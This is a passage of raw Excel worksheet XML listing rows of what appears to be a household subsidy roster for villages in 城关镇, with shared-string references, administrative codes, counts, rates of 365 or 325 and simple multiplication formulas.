      <c r="C302" s="17" t="str">
        <f>C301</f>
        <v>中华村</v>
      </c>
      <c r="D302" s="16" t="s">
        <v>957</v>
      </c>
      <c r="E302" s="16" t="s">
        <v>958</v>
      </c>
      <c r="F302" s="17" t="str">
        <f>F301</f>
        <v>4113210108</v>
      </c>
      <c r="G302" s="17"/>
      <c r="H302" s="17"/>
      <c r="I302" s="17"/>
      <c r="J302" s="17"/>
      <c r="K302" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="303" customHeight="1" spans="1:11">
      <c r="A303" s="16" t="s">
        <v>959</v>
      </c>
      <c r="B303" s="17" t="str">
        <f>B302</f>
        <v>城关镇</v>
      </c>
      <c r="C303" s="17" t="str">
        <f>C302</f>
        <v>中华村</v>
      </c>
      <c r="D303" s="16" t="s">
        <v>960</v>
      </c>
      <c r="E303" s="16" t="s">
        <v>961</v>
      </c>
      <c r="F303" s="17" t="str">
        <f>F302</f>
        <v>4113210108</v>
      </c>
      <c r="G303" s="17"/>
      <c r="H303" s="17"/>
      <c r="I303" s="17"/>
      <c r="J303" s="17"/>
      <c r="K303" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="304" customHeight="1" spans="1:11">
      <c r="A304" s="16" t="s">
        <v>962</v>
      </c>
      <c r="B304" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C304" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D304" s="17" t="s">
        <v>963</v>
      </c>
      <c r="E304" s="17" t="s">
        <v>499</v>
      </c>
      <c r="F304" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G304" s="17">
        <v>1</v>
      </c>
      <c r="H304" s="18">
        <v>365</v>
      </c>
      <c r="I304" s="17">
        <f>H304*G304</f>
        <v>365</v>
      </c>
      <c r="J304" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K304" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="305" customHeight="1" spans="1:11">
      <c r="A305" s="16" t="s">
        <v>964</v>
      </c>
      <c r="B305" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C305" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D305" s="17" t="s">
        <v>965</v>
      </c>
      <c r="E305" s="17" t="s">
        <v>966</v>
      </c>
      <c r="F305" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G305" s="17">
        <v>1</v>
      </c>
      <c r="H305" s="18">
        <v>365</v>
      </c>
      <c r="I305" s="17">
        <f>H305*G305</f>
        <v>365</v>
      </c>
      <c r="J305" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K305" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="306" customHeight="1" spans="1:11">
      <c r="A306" s="16" t="s">
        <v>967</v>
      </c>
      <c r="B306" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C306" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D306" s="17" t="s">
        <v>968</v>
      </c>
      <c r="E306" s="17" t="s">
        <v>969</v>
      </c>
      <c r="F306" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G306" s="17">
        <v>2</v>
      </c>
      <c r="H306" s="18">
        <v>325</v>
      </c>
      <c r="I306" s="17">
        <f>H306*G306</f>
        <v>650</v>
      </c>
      <c r="J306" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K306" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="307" customHeight="1" spans="1:11">
      <c r="A307" s="16" t="s">
        <v>970</v>
      </c>
      <c r="B307" s="17" t="str">
        <f>B306</f>
        <v>城关镇</v>
      </c>
      <c r="C307" s="17" t="str">
        <f>C306</f>
        <v>东北一组</v>
      </c>
      <c r="D307" s="16" t="s">
        <v>971</v>
      </c>
      <c r="E307" s="16" t="s">
        <v>402</v>
      </c>
      <c r="F307" s="17" t="str">
        <f>F306</f>
        <v>4113210103</v>
      </c>
      <c r="G307" s="17"/>
      <c r="H307" s="17"/>
      <c r="I307" s="17"/>
      <c r="J307" s="17"/>
      <c r="K307" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="308" customHeight="1" spans="1:11">
      <c r="A308" s="16" t="s">
        <v>972</v>
      </c>
      <c r="B308" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C308" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D308" s="17" t="s">
        <v>973</v>
      </c>
      <c r="E308" s="17" t="s">
        <v>955</v>
      </c>
      <c r="F308" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G308" s="17">
        <v>1</v>
      </c>
      <c r="H308" s="18">
        <v>365</v>
      </c>
      <c r="I308" s="17">
        <f>H308*G308</f>
        <v>365</v>
      </c>
      <c r="J308" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K308" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="309" customHeight="1" spans="1:11">
      <c r="A309" s="16" t="s">
        <v>974</v>
      </c>
      <c r="B309" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C309" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D309" s="17" t="s">
        <v>975</v>
      </c>
      <c r="E309" s="17" t="s">
        <v>346</v>
      </c>
      <c r="F309" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G309" s="17">
        <v>2</v>
      </c>
      <c r="H309" s="18">
        <v>325</v>
      </c>
      <c r="I309" s="17">
        <f>H309*G309</f>
        <v>650</v>
      </c>
      <c r="J309" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K309" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="310" customHeight="1" spans="1:11">
      <c r="A310" s="16" t="s">
        <v>976</v>
      </c>
      <c r="B310" s="17" t="str">
        <f>B309</f>
        <v>城关镇</v>
      </c>
      <c r="C310" s="17" t="str">
        <f>C309</f>
        <v>西北村</v>
      </c>
      <c r="D310" s="16" t="s">
        <v>977</v>
      </c>
      <c r="E310" s="16" t="s">
        <v>370</v>
      </c>
      <c r="F310" s="17" t="str">
        <f>F309</f>
        <v>4113210106</v>
      </c>
      <c r="G310" s="17"/>
      <c r="H310" s="17"/>
      <c r="I310" s="17"/>
      <c r="J310" s="17"/>
      <c r="K310" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="311" customHeight="1" spans="1:11">
      <c r="A311" s="16" t="s">
        <v>978</v>
      </c>
      <c r="B311" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C311" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D311" s="17" t="s">
        <v>979</v>
      </c>
      <c r="E311" s="17" t="s">
        <v>980</v>
      </c>
      <c r="F311" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G311" s="17">
        <v>2</v>
      </c>
      <c r="H311" s="18">
        <v>325</v>
      </c>
      <c r="I311" s="17">
        <f>H311*G311</f>
        <v>650</v>
      </c>
      <c r="J311" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K311" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="312" customHeight="1" spans="1:11">
      <c r="A312" s="16" t="s">
        <v>981</v>
      </c>
      <c r="B312" s="17" t="str">
        <f>B311</f>
        <v>城关镇</v>
      </c>
      <c r="C312" s="17" t="str">
        <f>C311</f>
        <v>中华村</v>
      </c>
      <c r="D312" s="16" t="s">
        <v>982</v>
      </c>
      <c r="E312" s="16" t="s">
        <v>780</v>
      </c>
      <c r="F312" s="17" t="str">
        <f>F311</f>
        <v>4113210108</v>
      </c>
      <c r="G312" s="17"/>
      <c r="H312" s="17"/>
      <c r="I312" s="17"/>
      <c r="J312" s="17"/>
      <c r="K312" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="313" customHeight="1" spans="1:11">
      <c r="A313" s="16" t="s">
        <v>983</v>
      </c>
      <c r="B313" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C313" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D313" s="17" t="s">
        <v>984</v>
      </c>
      <c r="E313" s="17" t="s">
        <v>985</v>
      </c>
      <c r="F313" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G313" s="17">
        <v>1</v>
      </c>
      <c r="H313" s="18">
        <v>365</v>
      </c>
      <c r="I313" s="17">
        <f>H313*G313</f>
        <v>365</v>
      </c>
      <c r="J313" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K313" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="314" customHeight="1" spans="1:11">
      <c r="A314" s="16" t="s">
        <v>986</v>
      </c>
      <c r="B314" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C314" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D314" s="17" t="s">
        <v>987</v>
      </c>
      <c r="E314" s="17" t="s">
        <v>481</v>
      </c>
      <c r="F314" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G314" s="17">
        <v>2</v>
      </c>
      <c r="H314" s="18">
        <v>325</v>
      </c>
      <c r="I314" s="17">
        <f>H314*G314</f>
        <v>650</v>
      </c>
      <c r="J314" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K314" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="315" customHeight="1" spans="1:11">
      <c r="A315" s="16" t="s">
        <v>988</v>
      </c>
      <c r="B315" s="17" t="str">
        <f>B314</f>
        <v>城关镇</v>
      </c>
      <c r="C315" s="17" t="str">
        <f>C314</f>
        <v>北外村</v>
      </c>
      <c r="D315" s="16" t="s">
        <v>989</v>
      </c>
      <c r="E315" s="16" t="s">
        <v>499</v>
      </c>
      <c r="F315" s="17" t="str">
        <f>F314</f>
        <v>4113210102</v>
      </c>
      <c r="G315" s="17"/>
      <c r="H315" s="17"/>
      <c r="I315" s="17"/>
      <c r="J315" s="17"/>
      <c r="K315" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="316" customHeight="1" spans="1:11">
      <c r="A316" s="16" t="s">
        <v>990</v>
      </c>
      <c r="B316" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C316" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D316" s="17" t="s">
        <v>991</v>
      </c>
      <c r="E316" s="17" t="s">
        <v>992</v>
      </c>
      <c r="F316" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G316" s="17">
        <v>2</v>
      </c>
      <c r="H316" s="18">
        <v>325</v>
      </c>
      <c r="I316" s="17">
        <f>H316*G316</f>
        <v>650</v>
      </c>
      <c r="J316" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K316" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="317" customHeight="1" spans="1:11">
      <c r="A317" s="16" t="s">
        <v>993</v>
      </c>
      <c r="B317" s="17" t="str">
        <f>B316</f>
        <v>城关镇</v>
      </c>
      <c r="C317" s="17" t="str">
        <f>C316</f>
        <v>北外村</v>
      </c>
      <c r="D317" s="16" t="s">
        <v>994</v>
      </c>
      <c r="E317" s="16" t="s">
        <v>995</v>
      </c>
      <c r="F317" s="17" t="str">
        <f>F316</f>
        <v>4113210102</v>
      </c>
      <c r="G317" s="17"/>
      <c r="H317" s="17"/>
      <c r="I317" s="17"/>
      <c r="J317" s="17"/>
      <c r="K317" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="318" customHeight="1" spans="1:11">
      <c r="A318" s="16" t="s">
        <v>996</v>
      </c>
      <c r="B318" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C318" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D318" s="17" t="s">
        <v>997</v>
      </c>
      <c r="E318" s="17" t="s">
        <v>323</v>
      </c>
      <c r="F318" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G318" s="17">
        <v>1</v>
      </c>
      <c r="H318" s="18">
        <v>365</v>
      </c>
      <c r="I318" s="17">
        <f>H318*G318</f>
        <v>365</v>
      </c>
      <c r="J318" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K318" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="319" customHeight="1" spans="1:11">
      <c r="A319" s="16" t="s">
        <v>998</v>
      </c>
      <c r="B319" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C319" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D319" s="17" t="s">
        <v>999</v>
      </c>
      <c r="E319" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F319" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G319" s="17">
        <v>2</v>
      </c>
      <c r="H319" s="18">
        <v>325</v>
      </c>
      <c r="I319" s="17">
        <f>H319*G319</f>
        <v>650</v>
      </c>
      <c r="J319" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K319" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="320" customHeight="1" spans="1:11">
      <c r="A320" s="16" t="s">
        <v>1000</v>
      </c>
      <c r="B320" s="17" t="str">
        <f>B319</f>
        <v>城关镇</v>
      </c>
      <c r="C320" s="17" t="str">
        <f>C319</f>
        <v>中华村</v>
      </c>
      <c r="D320" s="16" t="s">
        <v>1001</v>
      </c>
      <c r="E320" s="16" t="s">
        <v>738</v>
      </c>
      <c r="F320" s="17" t="str">
        <f>F319</f>
        <v>4113210108</v>
      </c>
      <c r="G320" s="17"/>
      <c r="H320" s="17"/>
      <c r="I320" s="17"/>
      <c r="J320" s="17"/>
      <c r="K320" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="321" customHeight="1" spans="1:11">
      <c r="A321" s="16" t="s">
        <v>1002</v>
      </c>
      <c r="B321" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C321" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D321" s="17" t="s">
        <v>1003</v>
      </c>
      <c r="E321" s="17" t="s">
        <v>499</v>
      </c>
      <c r="F321" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G321" s="17">
        <v>1</v>
      </c>
      <c r="H321" s="18">
        <v>365</v>
      </c>
      <c r="I321" s="17">
        <f>H321*G321</f>
        <v>365</v>
      </c>
      <c r="J321" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K321" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="322" customHeight="1" spans="1:11">
      <c r="A322" s="16" t="s">
        <v>1004</v>
      </c>
      <c r="B322" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C322" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D322" s="17" t="s">
        <v>1005</v>
      </c>
      <c r="E322" s="17" t="s">
        <v>432</v>
      </c>
      <c r="F322" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G322" s="17">
        <v>1</v>
      </c>
      <c r="H322" s="18">
        <v>365</v>
      </c>
      <c r="I322" s="17">
        <f>H322*G322</f>
        <v>365</v>
      </c>
      <c r="J322" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K322" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="323" customHeight="1" spans="1:11">
      <c r="A323" s="16" t="s">
        <v>1006</v>
      </c>
      <c r="B323" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C323" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D323" s="17" t="s">
        <v>1007</v>
      </c>
      <c r="E323" s="17" t="s">
        <v>499</v>
      </c>
      <c r="F323" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G323" s="17">
        <v>1</v>
      </c>
      <c r="H323" s="18">
        <v>365</v>
      </c>
      <c r="I323" s="17">
        <f>H323*G323</f>
        <v>365</v>
      </c>
      <c r="J323" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K323" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="324" customHeight="1" spans="1:11">
      <c r="A324" s="16" t="s">
        <v>1008</v>
      </c>
      <c r="B324" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C324" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D324" s="17" t="s">
        <v>1009</v>
      </c>
      <c r="E324" s="17" t="s">
        <v>481</v>
      </c>
      <c r="F324" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G324" s="17">
        <v>2</v>
      </c>
      <c r="H324" s="18">
        <v>325</v>
      </c>
      <c r="I324" s="17">
        <f>H324*G324</f>
        <v>650</v>
      </c>
      <c r="J324" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K324" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="325" customHeight="1" spans="1:11">
      <c r="A325" s="16" t="s">
        <v>1010</v>
      </c>
      <c r="B325" s="17" t="str">
        <f>B324</f>
        <v>城关镇</v>
      </c>
      <c r="C325" s="17" t="str">
        <f>C324</f>
        <v>中华村</v>
      </c>
      <c r="D325" s="16" t="s">
        <v>1011</v>
      </c>
      <c r="E325" s="16" t="s">
        <v>1012</v>
      </c>
      <c r="F325" s="17" t="str">
        <f>F324</f>
        <v>4113210108</v>
      </c>
      <c r="G325" s="17"/>
      <c r="H325" s="17"/>
      <c r="I325" s="17"/>
      <c r="J325" s="17"/>
      <c r="K325" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="326" customHeight="1" spans="1:11">
      <c r="A326" s="16" t="s">
        <v>1013</v>
      </c>
      <c r="B326" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C326" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D326" s="17" t="s">
        <v>1014</v>
      </c>
      <c r="E326" s="17" t="s">
        <v>382</v>
      </c>
      <c r="F326" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G326" s="17">
        <v>2</v>
      </c>
      <c r="H326" s="18">
        <v>325</v>
      </c>
      <c r="I326" s="17">
        <f>H326*G326</f>
        <v>650</v>
      </c>
      <c r="J326" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K326" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="327" customHeight="1" spans="1:11">
      <c r="A327" s="16" t="s">
        <v>1015</v>
      </c>
      <c r="B327" s="17" t="str">
        <f>B326</f>
        <v>城关镇</v>
      </c>
      <c r="C327" s="17" t="str">
        <f>C326</f>
        <v>北外村</v>
      </c>
      <c r="D327" s="16" t="s">
        <v>1016</v>
      </c>
      <c r="E327" s="16" t="s">
        <v>239</v>
      </c>
      <c r="F327" s="17" t="str">
        <f>F326</f>
        <v>4113210102</v>
      </c>
      <c r="G327" s="17"/>
      <c r="H327" s="17"/>
      <c r="I327" s="17"/>
      <c r="J327" s="17"/>
      <c r="K327" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="328" customHeight="1" spans="1:11">
      <c r="A328" s="16" t="s">
        <v>1017</v>
      </c>
      <c r="B328" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C328" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D328" s="17" t="s">
        <v>1018</v>
      </c>
      <c r="E328" s="17" t="s">
        <v>273</v>
      </c>
      <c r="F328" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G328" s="17">
        <v>1</v>
      </c>
      <c r="H328" s="18">
        <v>365</v>
      </c>
      <c r="I328" s="17">
        <f t="shared" ref="I328:I338" si="12">H328*G328</f>
        <v>365</v>
      </c>
      <c r="J328" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K328" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="329" customHeight="1" spans="1:11">
      <c r="A329" s="16" t="s">
        <v>1019</v>
      </c>
      <c r="B329" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C329" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D329" s="17" t="s">
        <v>1020</v>
      </c>
      <c r="E329" s="17" t="s">
        <v>1021</v>
      </c>
      <c r="F329" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G329" s="17">
        <v>1</v>
      </c>
      <c r="H329" s="18">
        <v>365</v>
      </c>
      <c r="I329" s="17">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J329" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K329" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="330" customHeight="1" spans="1:11">
      <c r="A330" s="16" t="s">
        <v>1022</v>
      </c>
      <c r="B330" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C330" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D330" s="17" t="s">
        <v>1023</v>
      </c>
      <c r="E330" s="17" t="s">
        <v>312</v>
      </c>
      <c r="F330" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G330" s="17">
        <v>1</v>
      </c>
      <c r="H330" s="18">
        <v>365</v>
      </c>
      <c r="I330" s="17">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J330" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K330" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="331" customHeight="1" spans="1:11">
      <c r="A331" s="16" t="s">
        <v>1024</v>
      </c>
      <c r="B331" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C331" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D331" s="17" t="s">
        <v>1025</v>
      </c>
      <c r="E331" s="17" t="s">
        <v>738</v>
      </c>
      <c r="F331" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G331" s="17">
        <v>1</v>
      </c>
      <c r="H331" s="18">
        <v>365</v>
      </c>
      <c r="I331" s="17">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J331" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K331" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="332" customHeight="1" spans="1:11">
      <c r="A332" s="16" t="s">
        <v>1026</v>
      </c>
      <c r="B332" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C332" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D332" s="17" t="s">
        <v>1027</v>
      </c>
      <c r="E332" s="17" t="s">
        <v>877</v>
      </c>
      <c r="F332" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G332" s="17">
        <v>1</v>
      </c>
      <c r="H332" s="18">
        <v>365</v>
      </c>
      <c r="I332" s="17">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J332" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K332" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="333" customHeight="1" spans="1:11">
      <c r="A333" s="16" t="s">
        <v>1028</v>
      </c>
      <c r="B333" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C333" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D333" s="17" t="s">
        <v>1029</v>
      </c>
      <c r="E333" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F333" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G333" s="17">
        <v>1</v>
      </c>
      <c r="H333" s="18">
        <v>365</v>
      </c>
      <c r="I333" s="17">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J333" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K333" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="334" customHeight="1" spans="1:11">
      <c r="A334" s="16" t="s">
        <v>1030</v>
      </c>
      <c r="B334" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C334" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D334" s="17" t="s">
        <v>1031</v>
      </c>
      <c r="E334" s="17" t="s">
        <v>273</v>
      </c>
      <c r="F334" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G334" s="17">
        <v>1</v>
      </c>
      <c r="H334" s="18">
        <v>365</v>
      </c>
      <c r="I334" s="17">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J334" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K334" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="335" customHeight="1" spans="1:11">
      <c r="A335" s="16" t="s">
        <v>1032</v>
      </c>
      <c r="B335" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C335" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D335" s="17" t="s">
        <v>1033</v>
      </c>
      <c r="E335" s="17" t="s">
        <v>334</v>
      </c>
      <c r="F335" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G335" s="17">
        <v>1</v>
      </c>
      <c r="H335" s="18">
        <v>365</v>
      </c>
      <c r="I335" s="17">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J335" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K335" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="336" customHeight="1" spans="1:11">
      <c r="A336" s="16" t="s">
        <v>1034</v>
      </c>
      <c r="B336" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C336" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D336" s="17" t="s">
        <v>1035</v>
      </c>
      <c r="E336" s="17" t="s">
        <v>1036</v>
      </c>
      <c r="F336" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G336" s="17">
        <v>1</v>
      </c>
      <c r="H336" s="18">
        <v>365</v>
      </c>
      <c r="I336" s="17">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J336" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K336" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="337" customHeight="1" spans="1:11">
      <c r="A337" s="16" t="s">
        <v>1037</v>
      </c>
      <c r="B337" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C337" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D337" s="17" t="s">
        <v>1039</v>
      </c>
      <c r="E337" s="17" t="s">
        <v>496</v>
      </c>
      <c r="F337" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G337" s="17">
        <v>1</v>
      </c>
      <c r="H337" s="18">
        <v>365</v>
      </c>
      <c r="I337" s="17">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J337" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K337" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="338" customHeight="1" spans="1:11">
      <c r="A338" s="16" t="s">
        <v>1040</v>
      </c>
      <c r="B338" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C338" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D338" s="17" t="s">
        <v>1041</v>
      </c>
      <c r="E338" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F338" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G338" s="17">
        <v>2</v>
      </c>
      <c r="H338" s="18">
        <v>325</v>
      </c>
      <c r="I338" s="17">
        <f t="shared" si="12"/>
        <v>650</v>
      </c>
      <c r="J338" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K338" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="339" customHeight="1" spans="1:11">
      <c r="A339" s="16" t="s">
        <v>1042</v>
      </c>
      <c r="B339" s="17" t="str">
        <f>B338</f>
        <v>城关镇</v>
      </c>
      <c r="C339" s="17" t="str">
        <f>C338</f>
        <v>东北一组</v>
      </c>
      <c r="D339" s="16" t="s">
        <v>1043</v>
      </c>
      <c r="E339" s="16" t="s">
        <v>288</v>
      </c>
      <c r="F339" s="17" t="str">
        <f>F338</f>
        <v>4113210103</v>
      </c>
      <c r="G339" s="17"/>
      <c r="H339" s="17"/>
      <c r="I339" s="17"/>
      <c r="J339" s="17"/>
      <c r="K339" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="340" customHeight="1" spans="1:11">
      <c r="A340" s="16" t="s">
        <v>1044</v>
      </c>
      <c r="B340" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C340" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D340" s="17" t="s">
        <v>1045</v>
      </c>
      <c r="E340" s="17" t="s">
        <v>958</v>
      </c>
      <c r="F340" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G340" s="17">
        <v>1</v>
      </c>
      <c r="H340" s="18">
        <v>365</v>
      </c>
      <c r="I340" s="17">
        <f>H340*G340</f>
        <v>365</v>
      </c>
      <c r="J340" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K340" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="341" customHeight="1" spans="1:11">
      <c r="A341" s="16" t="s">
        <v>1046</v>
      </c>
      <c r="B341" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C341" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D341" s="17" t="s">
        <v>1047</v>
      </c>
      <c r="E341" s="17" t="s">
        <v>955</v>
      </c>
      <c r="F341" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G341" s="17">
        <v>2</v>
      </c>
      <c r="H341" s="18">
        <v>325</v>
      </c>
      <c r="I341" s="17">
        <f>H341*G341</f>
        <v>650</v>
      </c>
      <c r="J341" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K341" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="342" customHeight="1" spans="1:11">
      <c r="A342" s="16" t="s">
        <v>1048</v>
      </c>
      <c r="B342" s="17" t="str">
        <f>B341</f>
        <v>城关镇</v>
      </c>
      <c r="C342" s="17" t="str">
        <f>C341</f>
        <v>中华村</v>
      </c>
      <c r="D342" s="20" t="s">
        <v>1049</v>
      </c>
      <c r="E342" s="20" t="s">
        <v>1050</v>
      </c>
      <c r="F342" s="17" t="str">
        <f>F341</f>
        <v>4113210108</v>
      </c>
      <c r="G342" s="17"/>
      <c r="H342" s="17"/>
      <c r="I342" s="17"/>
      <c r="J342" s="17"/>
      <c r="K342" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="343" customHeight="1" spans="1:11">
      <c r="A343" s="16" t="s">
        <v>1051</v>
      </c>
      <c r="B343" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C343" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D343" s="17" t="s">
        <v>1052</v>
      </c>
      <c r="E343" s="17" t="s">
        <v>320</v>
      </c>
      <c r="F343" s="17" t="s">
